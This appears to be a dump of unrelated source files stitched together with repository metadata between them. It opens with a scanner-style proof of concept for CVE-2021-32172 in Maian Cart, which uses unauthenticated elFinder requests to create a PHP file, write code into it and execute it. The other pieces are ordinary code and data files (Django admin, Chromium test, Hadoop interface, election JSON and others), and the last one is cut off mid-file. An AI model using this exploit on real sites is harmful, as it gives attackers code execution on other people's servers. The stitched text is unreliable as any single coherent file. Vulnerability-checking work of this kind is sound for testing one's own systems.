            "cvss-score": "",
            "cve-id": "CVE-2021-32172",
            "cwe-id": "CWE-862"
        },
        "metadata": {
            "vuln-target": "",
        },
        "tags": ["cve", "cve2021", "rce", "unauth", "maian"],
    }

# Vender Fingerprint
def fingerprint(url):
    return True

# Proof of Concept
def poc(url):
    result = {}
    # gen_randstr requires an explicit length; 8 characters is enough for a unique marker
    randstr = gen_randstr(8)
    randstr_1 = gen_randstr(8)
    try:
        url = format_url(url)

        path = """/admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name={randstr}.php&target=l1_Lw""".format(randstr=randstr)
        method = "GET"
        data = """"""
        headers = {'Accept': '*/*'}
        resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)

        path = """/admin/index.php?p=ajax-ops&op=elfinder"""
        method = "POST"
        data = """cmd=put&target={{hash}}&content=%3c%3fphp%20echo%20%22{randstr_1}%22%3b%20%3f%3e""".format(randstr_1=randstr_1)
        headers = {'Accept': 'application/json, text/javascript, /; q=0.01', 'Accept-Language': 'en-US,en;q=0.5', 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'}
        resp1 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)

        path = """/product-downloads/{randstr}.php""".format(randstr=randstr)
        method = "GET"
        data = """"""
        headers = {'Accept': '*/*'}
        resp2 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)

        if resp2.status_code == 200 and randstr_1 in resp2.text:
            result["success"] = True
            result["info"] = info()
            result["payload"] = url+path
    except:
        result["success"] = False

    return result

# Exploit, can be same with poc()
def exp(url):
    return poc(url)

# Utils
def format_url(url):
    url = url.strip()
    if not ( url.startswith('http://') or url.startswith('https://') ):
        url = 'http://' + url
    url = url.rstrip('/')
    return url

def gen_randstr(length):
    return ''.join(random.sample(string.ascii_letters + string.digits, length))
1,417
332
<gh_stars>100-1000
from django.contrib import admin

import billing.models as billing_models

admin.site.register(billing_models.GCNewOrderNotification)
admin.site.register(billing_models.AuthorizeAIMResponse)
admin.site.register(billing_models.WorldPayResponse)
admin.site.register(billing_models.AmazonFPSResponse)


class PaylaneTransactionAdmin(admin.ModelAdmin):
    list_display = ('customer_name', 'customer_email', 'transaction_date', 'amount', 'success', 'error_code')
    list_filter = ('success',)
    ordering = ('-transaction_date',)
    search_fields = ['customer_name', 'customer_email']


admin.site.register(billing_models.PaylaneTransaction, PaylaneTransactionAdmin)
215
809
<reponame>nikitavlaev/embox
/**
 * @file
 *
 * @date 27.09.2013
 * @author <NAME>
 */

extern int __cxa_atexit(void (*destructor) (void *), void *arg, void *__dso_handle);

int __aeabi_atexit(void *object, void (*dtor)(void *this), void *handle) {
	return __cxa_atexit(dtor, object, handle);
}
120
348
<filename>docs/data/leg-t2/037/03702240.json {"nom":"Saunay","circ":"2ème circonscription","dpt":"Indre-et-Loire","inscrits":487,"abs":265,"votants":222,"blancs":21,"nuls":3,"exp":198,"res":[{"nuance":"LR","nom":"<NAME>","voix":107},{"nuance":"REM","nom":"<NAME>","voix":91}]}
114
575
<filename>ui/views/test/test_desktop_screen_x11.cc
// Copyright 2016 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.

#include "ui/views/test/test_desktop_screen_x11.h"

#include <memory>

#include "base/memory/singleton.h"

namespace views {
namespace test {

TestDesktopScreenX11* TestDesktopScreenX11::GetInstance() {
  return base::Singleton<TestDesktopScreenX11>::get();
}

gfx::Point TestDesktopScreenX11::GetCursorScreenPoint() {
  return cursor_screen_point_;
}

TestDesktopScreenX11::TestDesktopScreenX11() {
  DesktopScreenX11::Init();
}

TestDesktopScreenX11::~TestDesktopScreenX11() = default;

}  // namespace test
}  // namespace views
240
1,444
<filename>Mage.Sets/src/mage/cards/p/Pendelhaven.java
package mage.cards.p;

import java.util.UUID;
import mage.abilities.Ability;
import mage.abilities.common.SimpleActivatedAbility;
import mage.abilities.costs.common.TapSourceCost;
import mage.abilities.effects.common.continuous.BoostTargetEffect;
import mage.abilities.mana.GreenManaAbility;
import mage.cards.CardImpl;
import mage.cards.CardSetInfo;
import mage.constants.CardType;
import mage.constants.ComparisonType;
import mage.constants.Duration;
import mage.constants.SuperType;
import mage.constants.Zone;
import mage.filter.common.FilterCreaturePermanent;
import mage.filter.predicate.mageobject.PowerPredicate;
import mage.filter.predicate.mageobject.ToughnessPredicate;
import mage.target.common.TargetCreaturePermanent;

/**
 * @author Loki
 */
public final class Pendelhaven extends CardImpl {

    private static final FilterCreaturePermanent filter = new FilterCreaturePermanent("1/1 creature");

    static {
        filter.add(new PowerPredicate(ComparisonType.EQUAL_TO, 1));
        filter.add(new ToughnessPredicate(ComparisonType.EQUAL_TO, 1));
    }

    public Pendelhaven(UUID ownerId, CardSetInfo setInfo) {
        super(ownerId, setInfo, new CardType[]{CardType.LAND}, null);
        addSuperType(SuperType.LEGENDARY);

        // {tap}: Add {G}.
        this.addAbility(new GreenManaAbility());

        // {tap}: Target 1/1 creature gets +1/+2 until end of turn.
        Ability ability = new SimpleActivatedAbility(Zone.BATTLEFIELD, new BoostTargetEffect(1, 2, Duration.EndOfTurn), new TapSourceCost());
        ability.addTarget(new TargetCreaturePermanent(filter));
        this.addAbility(ability);
    }

    private Pendelhaven(final Pendelhaven card) {
        super(card);
    }

    @Override
    public Pendelhaven copy() {
        return new Pendelhaven(this);
    }
}
646
367
#import <Foundation/Foundation.h>

@class MBEOBJGroup;

@interface MBEOBJModel : NSObject

- (instancetype)initWithContentsOfURL:(NSURL *)fileURL generateNormals:(BOOL)generateNormals;

/// Index 0 corresponds to an unnamed group that collects all the geometry
/// declared outside of explicit "g" statements. Therefore, if your file
/// contains explicit groups, you'll probably want to start from index 1,
/// which will be the group beginning at the first group statement.
@property (nonatomic, readonly) NSArray *groups;

/// Retrieve a group from the OBJ file by name
- (MBEOBJGroup *)groupForName:(NSString *)groupName;

@end
179
435
<reponame>glasnt/data { "description": "Day 2, 14:30\u201315:00\n\nThis talk will share several python approaches to the thriving field, quantum computing and quantum information. In this talk, Cirq python framework, which is an open source project announced by Google, will be mainly used as examples.\n\nSlides: https://bit.ly/35cOeeR\n\nSpeaker: \u4f55\u6cf0\u7965 <NAME> (tai271828)\n\nCanonical Software Engineer. FLOSS contributor. Scientific computing amateur. Climber, pianist and cellist.", "recorded": "2020-09-06", "speakers": [ "\u4f55\u6cf0\u7965 <NAME> (tai271828)" ], "thumbnail_url": "https://i.ytimg.com/vi/rZb7lZCZ1jM/hqdefault.jpg", "title": "Python Approach to Quantum Computing - Cirq Framework and More \u2013 PyCon Taiwan 2020", "videos": [ { "type": "youtube", "url": "https://www.youtube.com/watch?v=rZb7lZCZ1jM" } ] }
333
14,425
/** * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.hadoop.yarn.server.timelineservice.storage.common; /** * Interface which has to be implemented for encoding and decoding row keys or * column qualifiers as string. */ public interface KeyConverterToString<T> { /** * Encode key as string. * @param key of type T to be encoded as string. * @return encoded value as string. */ String encodeAsString(T key); /** * Decode row key from string to a key of type T. * @param encodedKey string representation of row key * @return type T which has been constructed after decoding string. */ T decodeFromString(String encodedKey); }
379
852
<reponame>ckamtsikis/cmssw<gh_stars>100-1000
import FWCore.ParameterSet.Config as cms

from DQM.L1TMonitor.L1TFED_cfi import *
56
1,442
<gh_stars>1000+
#ifndef POINCARE_N_ARY_INFIX_EXPRESSION_H
#define POINCARE_N_ARY_INFIX_EXPRESSION_H

#include <poincare/n_ary_expression.h>

// NAryInfixExpressionNode are additions and multiplications

namespace Poincare {

class NAryInfixExpressionNode : public NAryExpressionNode {
public:
  using NAryExpressionNode::NAryExpressionNode;
  // Properties
  bool childAtIndexNeedsUserParentheses(const Expression & child, int childIndex) const override;
protected:
  // Order
  int simplificationOrderSameType(const ExpressionNode * e, bool ascending, bool ignoreParentheses) const override;
  int simplificationOrderGreaterType(const ExpressionNode * e, bool ascending, bool ignoreParentheses) const override;
};

}

#endif
220
1,805
#ifndef infonet_h #define infonet_h ///////////////////////////////////////////////// // Includes #include "base.h" ///////////////////////////////////////////////// // Thermal-Schedule ClassTP(TThermalSch, PThermalSch)//{ private: PXmlDoc TherapyPlacesXmlDoc; PXmlDoc ActivitiesXmlDoc; PXmlDoc AvailableTherapyPlacesXmlDoc; PXmlDoc AvailableActivitiesXmlDoc; PXmlDoc ScheduledActivitiesXmlDoc; PXmlDoc HolidaysXmlDoc; PXmlDoc MakeScheduleXmlDoc; PXmlDoc CheckScheduleXmlDoc; public: TThermalSch(){} static PThermalSch New(){return PThermalSch(new TThermalSch());} TThermalSch(TSIn&){Fail;} static PThermalSch Load(TSIn& SIn){return new TThermalSch(SIn);} void Save(TSOut&){Fail;} TThermalSch& operator=(const TThermalSch&){Fail; return *this;} // field-retrieval TStr GetFldVal(const PXmlTok& RecXmlTok, const TStr& FldNm) const; TStr GetFldVal(const PXmlDoc& RecXmlDoc, const TStr& FldNm) const; TStr GetFldDateVal(const PXmlTok& RecXmlTok, const TStr& FldNm) const; TStr GetFldDateVal(const PXmlDoc& RecXmlDoc, const TStr& FldNm) const; TStrV GetFldValV(const PXmlTok& RecXmlTok, const TStr& FldNm, const TStr& XFldNm, const TStr& SubFldNm=TStr()) const; // xml-output static TStr GetXmlOut_Ok(const TStr& OpNm); static TStr GetXmlOut_Error(const TStr& OpNm, const TStr& MsgStr); // execute generic commands TStr ExeCmFromXml(const PSIn& SIn); TStr ExeCmFromXmlFile(const TStr& FNm, const TStr& FPath); TStr ExeCmFromXmlStr(const TStr& Str); // execute specific commands TStr ExeCm_SetCatalogueTherapyPlaces(const PXmlDoc& XmlDoc); TStr ExeCm_SetCatalogueActivities(const PXmlDoc& XmlDoc); TStr ExeCm_SetCatalogueAvailableTherapyPlaces(const PXmlDoc& XmlDoc); TStr ExeCm_SetCatalogueAvailableActivities(const PXmlDoc& XmlDoc); TStr ExeCm_SetScheduledActivities(const PXmlDoc& XmlDoc); TStr ExeCm_SetCatalogueHolidays(const PXmlDoc& XmlDoc); TStr ExeCm_MakeSchedule(const PXmlDoc& XmlDoc); TStr ExeCm_CheckSchedule(const PXmlDoc& XmlDoc); // therapy places bool IsTherapyPlacesOk(TStr& MsgStr) const; int GetTherapyPlaces() const; PXmlTok GetTherapyPlace(const int& TherapyPlaceN) const; // field-retrieval TStr GetTherapyPlace_Code(const PXmlTok& TherapyPlace) const { return GetFldVal(TherapyPlace, "Code");} TStr GetTherapyPlace_Type(const PXmlTok& TherapyPlace) const { return GetFldVal(TherapyPlace, "Type");} TStr GetTherapyPlace_Location(const PXmlTok& TherapyPlace) const { return GetFldVal(TherapyPlace, "Location");} TStr GetTherapyPlace_Capacity(const PXmlTok& TherapyPlace) const { return GetFldVal(TherapyPlace, "Capacity");} TStr GetTherapyPlace_Distance(const PXmlTok& TherapyPlace) const { return GetFldVal(TherapyPlace, "Distance");} TStr GetTherapyPlace_Gender(const PXmlTok& TherapyPlace) const { return GetFldVal(TherapyPlace, "Gender");} TStr GetTherapyPlace_AlternateScheduling(const PXmlTok& TherapyPlace) const { return GetFldVal(TherapyPlace, "AlternateScheduling");} TStr GetTherapyPlace_FamilyScheduling(const PXmlTok& TherapyPlace) const { return GetFldVal(TherapyPlace, "FamilyScheduling");} TStr GetTherapyPlace_TherapistType(const PXmlTok& TherapyPlace) const { return GetFldVal(TherapyPlace, "TherapistType");} // activities bool IsActivitiesOk(TStr& MsgStr) const; int GetActivities() const; PXmlTok GetActivity(const int& ActivityN) const; // field-retrieval TStr GetActivity_Code(const PXmlTok& Activity) const { return GetFldVal(Activity, "Code");} TStr GetActivity_Type(const PXmlTok& Activity) const { return GetFldVal(Activity, "Type");} TStr GetActivity_Name(const PXmlTok& Activity) const { return 
GetFldVal(Activity, "Name");} TStr GetActivity_Priority(const PXmlTok& Activity) const { return GetFldVal(Activity, "Priority");} TStr GetActivity_Duration(const PXmlTok& Activity) const { TStr DurationSecsStr=GetFldVal(Activity, "Duration"); int DurationSecs=DurationSecsStr.GetInt(0); int DurationMins=DurationSecs/60; return TInt::GetStr(DurationMins);} TStr GetActivity_TPDuration(const PXmlTok& Activity) const { TStr DurationSecsStr=GetFldVal(Activity, "TPDuration"); int DurationSecs=DurationSecsStr.GetInt(0); int DurationMins=DurationSecs/60; return TInt::GetStr(DurationMins);} TStr GetActivity_PatientDuration(const PXmlTok& Activity) const { TStr DurationSecsStr=GetFldVal(Activity, "PatientDuration"); int DurationSecs=DurationSecsStr.GetInt(0); int DurationMins=DurationSecs/60; return TInt::GetStr(DurationMins);} TStr GetActivity_TherapistDurationPreparation(const PXmlTok& Activity) const { return GetFldVal(Activity, "TherapistDuration|Preparation");} TStr GetActivity_TherapistDurationExecution(const PXmlTok& Activity) const { return GetFldVal(Activity, "TherapistDuration|Execution");} TStr GetActivity_TherapistDurationAdditionalTime(const PXmlTok& Activity) const { return GetFldVal(Activity, "TherapistDuration|AdditionalTime");} TStr GetActivity_Weariness(const PXmlTok& Activity) const { return GetFldVal(Activity, "Weariness");} TStr GetActivity_Dry(const PXmlTok& Activity) const { return GetFldVal(Activity, "Dry");} // available therapy places bool IsAvailableTherapyPlacesOk(TStr& MsgStr) const; int GetAvailableTherapyPlaces() const; PXmlTok GetAvailableTherapyPlace(const int& AvailableTherapyPlaceN) const; TStr GetAvailableTherapyPlace_Code(const PXmlTok& AvailableTherapyPlace) const { return GetFldVal(AvailableTherapyPlace, "Code");} int GetTherapyPlaceSchedules(const PXmlTok& AvailableTherapyPlace) const; PXmlTok GetTherapyPlaceSchedule( const PXmlTok& AvailableTherapyPlace, const int& TherapyPlaceScheduleN) const; // therapy-place-schedule TStrV GetTherapyPlaceSchedule_WeekDays(const PXmlTok& TherapyPlaceSchedule) const { return GetFldValV(TherapyPlaceSchedule, "Days", "Day");} TStr GetTherapyPlaceSchedule_OpenFrom(const PXmlTok& TherapyPlaceSchedule) const { return GetFldVal(TherapyPlaceSchedule, "OpenTimes|Open|From");} TStr GetTherapyPlaceSchedule_OpenTill(const PXmlTok& TherapyPlaceSchedule) const { return GetFldVal(TherapyPlaceSchedule, "OpenTimes|Open|Till");} TStr GetTherapyPlaceSchedule_ValidFrom(const PXmlTok& TherapyPlaceSchedule) const { return GetFldDateVal(TherapyPlaceSchedule, "ValidFrom");} TStr GetTherapyPlaceSchedule_ValidTo(const PXmlTok& TherapyPlaceSchedule) const { return GetFldDateVal(TherapyPlaceSchedule, "ValidTo");} // available activities bool IsAvailableActivitiesOk(TStr& MsgStr) const; int GetAvailableActivities() const; PXmlTok GetAvailableActivity(const int& AvailableActivityN) const; TStr GetAvailableActivity_Code(const PXmlTok& AvailableActivity) const { return GetFldVal(AvailableActivity, "Code");} int GetActivitySchedules(const PXmlTok& AvailableActivity) const; PXmlTok GetActivitySchedule( const PXmlTok& AvailableActivity, const int& ActivityScheduleN) const; // activity-schedule TStrV GetActivitySchedule_WeekDays(const PXmlTok& TherapyPlaceSchedule) const { return GetFldValV(TherapyPlaceSchedule, "Days", "Day");} TStr GetActivitySchedule_StartTime(const PXmlTok& TherapyPlaceSchedule) const { return GetFldVal(TherapyPlaceSchedule, "StartTime");} TStr GetActivitySchedule_EndTime(const PXmlTok& TherapyPlaceSchedule) const { return 
GetFldVal(TherapyPlaceSchedule, "EndTime");} TStr GetActivitySchedule_TherapyPlaceType(const PXmlTok& TherapyPlaceSchedule) const { return GetFldVal(TherapyPlaceSchedule, "TherapyPlaceType");} TStr GetActivitySchedule_Gender(const PXmlTok& TherapyPlaceSchedule) const { return GetFldVal(TherapyPlaceSchedule, "Attributes|Gender");} TStr GetActivitySchedule_ValidFrom(const PXmlTok& TherapyPlaceSchedule) const { return GetFldDateVal(TherapyPlaceSchedule, "ValidFrom");} TStr GetActivitySchedule_ValidTo(const PXmlTok& TherapyPlaceSchedule) const { return GetFldDateVal(TherapyPlaceSchedule, "ValidTo");} // scheduled-activities bool IsScheduledActivitiesOk(TStr& MsgStr) const; int GetScheduledActivities() const; PXmlTok GetScheduledActivity(const int& ScheduledActivityN) const; // field-retrieval TStr GetScheduledActivity_Code(const PXmlTok& ScheduledActivity) const { return GetFldVal(ScheduledActivity, "Code");} TStr GetScheduledActivity_PatientATPCode(const PXmlTok& ScheduledActivity) const { return GetFldVal(ScheduledActivity, "ATPCode");} TStr GetScheduledActivity_Patient(const PXmlTok& ScheduledActivity) const { return GetFldVal(ScheduledActivity, "Code");} TStr GetScheduledActivity_TherapistCode(const PXmlTok& ScheduledActivity) const { return GetFldVal(ScheduledActivity, "TherapistCode");} TStr GetScheduledActivity_StartDateTime(const PXmlTok& ScheduledActivity) const { return GetFldDateVal(ScheduledActivity, "StartDateTime");} TStr GetScheduledActivity_RepetitionNumber(const PXmlTok& ScheduledActivity) const { return GetFldVal(ScheduledActivity, "RepetitionNumber");} TStr GetScheduledActivity_StartingPoint(const PXmlTok& ScheduledActivity) const { return GetFldVal(ScheduledActivity, "StartingPoint");} TStr GetScheduledActivity_PatientCode(const PXmlTok& ScheduledActivity) const { return GetFldVal(ScheduledActivity, "PatientCode");} TStr GetScheduledActivity_ActivityCode(const PXmlTok& ScheduledActivity) const { return GetFldVal(ScheduledActivity, "ActivityCode");} TStr GetScheduledActivity_TherapyPlaceCode(const PXmlTok& ScheduledActivity) const { return GetFldVal(ScheduledActivity, "TherapyPlaceCode");} TStr GetScheduledActivity_Date(const PXmlTok& ScheduledActivity) const { return GetFldVal(ScheduledActivity, "Date");} TStr GetScheduledActivity_StartTime(const PXmlTok& ScheduledActivity) const { return GetFldVal(ScheduledActivity, "StartTime");} TStr GetScheduledActivity_PatientDuration(const PXmlTok& ScheduledActivity) const { return GetFldVal(ScheduledActivity, "PatientDuration");} TStr GetScheduledActivity_TPDuration(const PXmlTok& ScheduledActivity) const { return GetFldVal(ScheduledActivity, "TPDuration");} TStr GetScheduledActivity_Accordance(const PXmlTok& ScheduledActivity) const { return GetFldVal(ScheduledActivity, "Accordance");} // holidays bool IsHolidaysOk(TStr& MsgStr) const; int GetHolidays() const; PXmlTok GetHoliday(const int& HolidayN) const; // field-retrieval TStr GetHoliday_Date(const PXmlTok& Holiday) const { return GetFldDateVal(Holiday, "");} // make schedule bool IsMakeScheduleOk(TStr& MsgStr) const; TStr GetMakeSchedule_PatientCode() const { return GetFldVal(MakeScheduleXmlDoc, "Operation|Parameter|Patient|Code");} TStr GetMakeSchedule_PatientGender() const { return GetFldVal(MakeScheduleXmlDoc, "Operation|Parameter|Patient|Attributes|Gender");} TStr GetMakeSchedule_PatientFamily() const { return GetFldVal(MakeScheduleXmlDoc, "Operation|Parameter|Patient|Attributes|Family");} TStr GetMakeSchedule_PatientATPCode() const { return GetFldVal(MakeScheduleXmlDoc, 
"Operation|Parameter|Patient|ATPCode");} int GetMakeSchedule_PlanRequests() const; PXmlTok GetMakeSchedule_PlanRequest(const int& PlanRequestN) const; TStr GetMakeSchedule_PlanRequest_ActivityCode(const PXmlTok& PlanRequest) const { return GetFldVal(PlanRequest, "ActivityCode");} TStr GetMakeSchedule_PlanRequest_Quantity(const PXmlTok& PlanRequest) const { return GetFldVal(PlanRequest, "Quantity");} TStr GetMakeSchedule_PlanRequest_DayQuantity(const PXmlTok& PlanRequest) const { return GetFldVal(PlanRequest, "DayQuantity");} TStr GetMakeSchedule_PlanRequest_Frequency(const PXmlTok& PlanRequest) const { return GetFldVal(PlanRequest, "Frequency");} TStr GetMakeSchedule_PlanRequest_AlternatingActivityCode(const PXmlTok& PlanRequest) const { return GetFldVal(PlanRequest, "AlternatingActivityCode");} TStrV GetMakeSchedule_PlanRequest_ExcludedActivities_ActivityCode(const PXmlTok& PlanRequest) const { return GetFldValV(PlanRequest, "ExcludedActivities", "ExcludedActivity", "ActivityCode");} TStrV GetMakeSchedule_PlanRequest_ExcludedActivities_Time(const PXmlTok& PlanRequest) const { TStrV TimeStrV=GetFldValV(PlanRequest, "ExcludedActivities", "ExcludedActivity", "Time"); for (int TimeStrN=0; TimeStrN<TimeStrV.Len(); TimeStrN++){ TimeStrV[TimeStrN]=TInt::GetStr(TimeStrV[TimeStrN].GetInt(0)/60);} return TimeStrV; } TStr GetMakeSchedule_PlanRequest_FamilyActivity(const PXmlTok& PlanRequest) const { return GetFldVal(PlanRequest, "FamilyActivity");} TStr GetMakeSchedule_PlanRequest_TreatmentDate(const PXmlTok& PlanRequest) const { return GetFldDateVal(PlanRequest, "TreatmentDate");} TStr GetMakeSchedule_PlanRequest_DesiredStartTime(const PXmlTok& PlanRequest) const { return GetFldVal(PlanRequest, "DesiredStartTime");} TStr GetMakeSchedule_PlanRequest_DesiredFinishTime(const PXmlTok& PlanRequest) const { return GetFldVal(PlanRequest, "DesiredFinishTime");} TStr GetMakeSchedule_PlanRequest_AttrNm(const PXmlTok& PlanRequest) const { TStr FldVal=GetFldVal(PlanRequest, "Attributes|Name"); if (FldVal=="Family"){return "DRUZINA";} if (FldVal=="Gender"){return "SPOL_300";} return FldVal.GetUc();} // check schedule bool IsCheckScheduleOk(TStr& MsgStr) const; TStr GetCheckSchedule_PatientCode() const { return GetFldVal(CheckScheduleXmlDoc, "Operation|Parameter|Patient|Code");} TStr GetCheckSchedule_PatientGender() const { return GetFldVal(CheckScheduleXmlDoc, "Operation|Parameter|Patient|Gender");} TStr GetCheckSchedule_PatientATPCode() const { return GetFldVal(CheckScheduleXmlDoc, "Operation|Parameter|Patient|ATPCode");} TStr GetCheckSchedule_IntRequestedActivityActivityCode() const { return GetFldVal(CheckScheduleXmlDoc, "Operation|Parameter|IntRequestedActivity|ActivityCode");} TStr GetCheckSchedule_IntRequestedActivityDayQuantity() const { return GetFldVal(CheckScheduleXmlDoc, "Operation|Parameter|IntRequestedActivity|DayQuantity");} TStr GetCheckSchedule_IntRequestedActivityTreatmentDate() const { return GetFldDateVal(CheckScheduleXmlDoc, "Operation|Parameter|IntRequestedActivity|TreatmentDate");} TStr GetCheckSchedule_IntRequestedActivityDesiredStartTime() const { return GetFldVal(CheckScheduleXmlDoc, "Operation|Parameter|IntRequestedActivity|DesiredStartTime");} TStr GetCheckSchedule_IntRequestedActivityDesiredFinishTime() const { return GetFldVal(CheckScheduleXmlDoc, "Operation|Parameter|IntRequestedActivity|DesiredFinishTime");} // field saving void SaveFldDef(FILE* FId, const TStr& FldNm) const { fprintf(FId, "\"%s\"\r\n", FldNm.CStr());} void SaveFldVal(FILE* FId, const TStr& FldVal, const bool& 
EolnP=false) const { fprintf(FId, "\"%s\"", FldVal.CStr()); if (EolnP){fprintf(FId, "\r\n");} else {fprintf(FId, ",");}} void SaveFldValV(FILE* FId, const TStrV& FldValV, const bool& EolnP=false) const { fprintf(FId, "\""); for (int FldValN=0; FldValN<FldValV.Len(); FldValN++){ if (FldValN!=0){fprintf(FId, ",");} fprintf(FId, "%s", FldValV[FldValN].CStr()); } fprintf(FId, "\""); if (EolnP){fprintf(FId, "\r\n");} else {fprintf(FId, ",");}} // save to CSV & XML static void SaveCsvToXml( const TStr& DefFNm, const TStr& DatFNm, const TStr& OutXmlFNm); static void SaveCsvToXmlParamOut( const TStr& DefFNm, const TStr& DatFNm, const TStr& OutXmlFNm); void SaveOldCsv() const; void SaveOldCsv_KatalogZdrDelavcev() const; void SaveOldCsv_KatalogAparatov() const; void SaveOldCsv_KatalogAktivnosti() const; void SaveOldCsv_UrnikZaTerapevte() const; void SaveOldCsv_UrnikZaAparate() const; void SaveOldCsv_UrnikAktivnosti() const; void SaveOldCsv_MozniTerminiVDnevu() const; void SaveOldCsv_Prazniki() const; void SaveOldCsv_PredpisaneTerapije() const; void SaveOldCsv_PlaniraneAktivnosti() const; void SaveOldCsv_UrnikXX() const; // DLL functions static PThermalSch DllThermalSch; static void DllNewThermalSch(){ DllThermalSch=TThermalSch::New();} static char* DllExeCmFromXmlFile(char* FNm, char* FPath); static char* DllExeCmFromXmlStr(char* XmlStr); }; #endif
6,138
6,989
<reponame>avrumnoor/NewsSummarizer ############################################################################### # Customizable Pickler with some basic reducers # # author: <NAME> # # adapted from multiprocessing/reduction.py (17/02/2017) # * Replace the ForkingPickler with a similar _LokyPickler, # * Add CustomizableLokyPickler to allow customizing pickling process # on the fly. # import io import os import sys import functools from multiprocessing import util import types try: # Python 2 compat from cPickle import loads as pickle_loads except ImportError: from pickle import loads as pickle_loads import copyreg from pickle import HIGHEST_PROTOCOL if sys.platform == "win32": if sys.version_info[:2] > (3, 3): from multiprocessing.reduction import duplicate else: from multiprocessing.forking import duplicate ############################################################################### # Enable custom pickling in Loky. # To allow instance customization of the pickling process, we use 2 classes. # _ReducerRegistry gives module level customization and CustomizablePickler # permits to use instance base custom reducers. Only CustomizablePickler # should be used. class _ReducerRegistry(object): """Registry for custom reducers. HIGHEST_PROTOCOL is selected by default as this pickler is used to pickle ephemeral datastructures for interprocess communication hence no backward compatibility is required. """ # We override the pure Python pickler as its the only way to be able to # customize the dispatch table without side effects in Python 2.6 # to 3.2. For Python 3.3+ leverage the new dispatch_table # feature from http://bugs.python.org/issue14166 that makes it possible # to use the C implementation of the Pickler which is faster. dispatch_table = {} @classmethod def register(cls, type, reduce_func): """Attach a reducer function to a given type in the dispatch table.""" if sys.version_info < (3,): # Python 2 pickler dispatching is not explicitly customizable. # Let us use a closure to workaround this limitation. def dispatcher(cls, obj): reduced = reduce_func(obj) cls.save_reduce(obj=obj, *reduced) cls.dispatch_table[type] = dispatcher else: cls.dispatch_table[type] = reduce_func ############################################################################### # Registers extra pickling routines to improve picklization for loky register = _ReducerRegistry.register # make methods picklable def _reduce_method(m): if m.__self__ is None: return getattr, (m.__class__, m.__func__.__name__) else: return getattr, (m.__self__, m.__func__.__name__) class _C: def f(self): pass @classmethod def h(cls): pass register(type(_C().f), _reduce_method) register(type(_C.h), _reduce_method) if not hasattr(sys, "pypy_version_info"): # PyPy uses functions instead of method_descriptors and wrapper_descriptors def _reduce_method_descriptor(m): return getattr, (m.__objclass__, m.__name__) register(type(list.append), _reduce_method_descriptor) register(type(int.__add__), _reduce_method_descriptor) # Make partial func pickable def _reduce_partial(p): return _rebuild_partial, (p.func, p.args, p.keywords or {}) def _rebuild_partial(func, args, keywords): return functools.partial(func, *args, **keywords) register(functools.partial, _reduce_partial) if sys.platform != "win32": from ._posix_reduction import _mk_inheritable # noqa: F401 else: from . 
import _win_reduction # noqa: F401 # global variable to change the pickler behavior try: from joblib.externals import cloudpickle # noqa: F401 DEFAULT_ENV = "cloudpickle" except ImportError: # If cloudpickle is not present, fallback to pickle DEFAULT_ENV = "pickle" ENV_LOKY_PICKLER = os.environ.get("LOKY_PICKLER", DEFAULT_ENV) _LokyPickler = None _loky_pickler_name = None def set_loky_pickler(loky_pickler=None): global _LokyPickler, _loky_pickler_name if loky_pickler is None: loky_pickler = ENV_LOKY_PICKLER loky_pickler_cls = None # The default loky_pickler is cloudpickle if loky_pickler in ["", None]: loky_pickler = "cloudpickle" if loky_pickler == _loky_pickler_name: return if loky_pickler == "cloudpickle": from joblib.externals.cloudpickle import CloudPickler as loky_pickler_cls else: try: from importlib import import_module module_pickle = import_module(loky_pickler) loky_pickler_cls = module_pickle.Pickler except (ImportError, AttributeError) as e: extra_info = ("\nThis error occurred while setting loky_pickler to" " '{}', as required by the env variable LOKY_PICKLER" " or the function set_loky_pickler." .format(loky_pickler)) e.args = (e.args[0] + extra_info,) + e.args[1:] e.msg = e.args[0] raise e util.debug("Using '{}' for serialization." .format(loky_pickler if loky_pickler else "cloudpickle")) class CustomizablePickler(loky_pickler_cls): _loky_pickler_cls = loky_pickler_cls def _set_dispatch_table(self, dispatch_table): for ancestor_class in self._loky_pickler_cls.mro(): dt_attribute = getattr(ancestor_class, "dispatch_table", None) if isinstance(dt_attribute, types.MemberDescriptorType): # Ancestor class (typically _pickle.Pickler) has a # member_descriptor for its "dispatch_table" attribute. Use # it to set the dispatch_table as a member instead of a # dynamic attribute in the __dict__ of the instance, # otherwise it will not be taken into account by the C # implementation of the dump method if a subclass defines a # class-level dispatch_table attribute as was done in # cloudpickle 1.6.0: # https://github.com/joblib/loky/pull/260 dt_attribute.__set__(self, dispatch_table) break # On top of member descriptor set, also use setattr such that code # that directly access self.dispatch_table gets a consistent view # of the same table. self.dispatch_table = dispatch_table def __init__(self, writer, reducers=None, protocol=HIGHEST_PROTOCOL): loky_pickler_cls.__init__(self, writer, protocol=protocol) if reducers is None: reducers = {} if sys.version_info < (3,): self.dispatch = loky_pickler_cls.dispatch.copy() self.dispatch.update(_ReducerRegistry.dispatch_table) else: if hasattr(self, "dispatch_table"): # Force a copy that we will update without mutating the # any class level defined dispatch_table. loky_dt = dict(self.dispatch_table) else: # Use standard reducers as bases loky_dt = copyreg.dispatch_table.copy() # Register loky specific reducers loky_dt.update(_ReducerRegistry.dispatch_table) # Set the new dispatch table, taking care of the fact that we # need to use the member_descriptor when we inherit from a # subclass of the C implementation of the Pickler base class # with an class level dispatch_table attribute. self._set_dispatch_table(loky_dt) # Register custom reducers for type, reduce_func in reducers.items(): self.register(type, reduce_func) def register(self, type, reduce_func): """Attach a reducer function to a given type in the dispatch table. """ if sys.version_info < (3,): # Python 2 pickler dispatching is not explicitly customizable. 
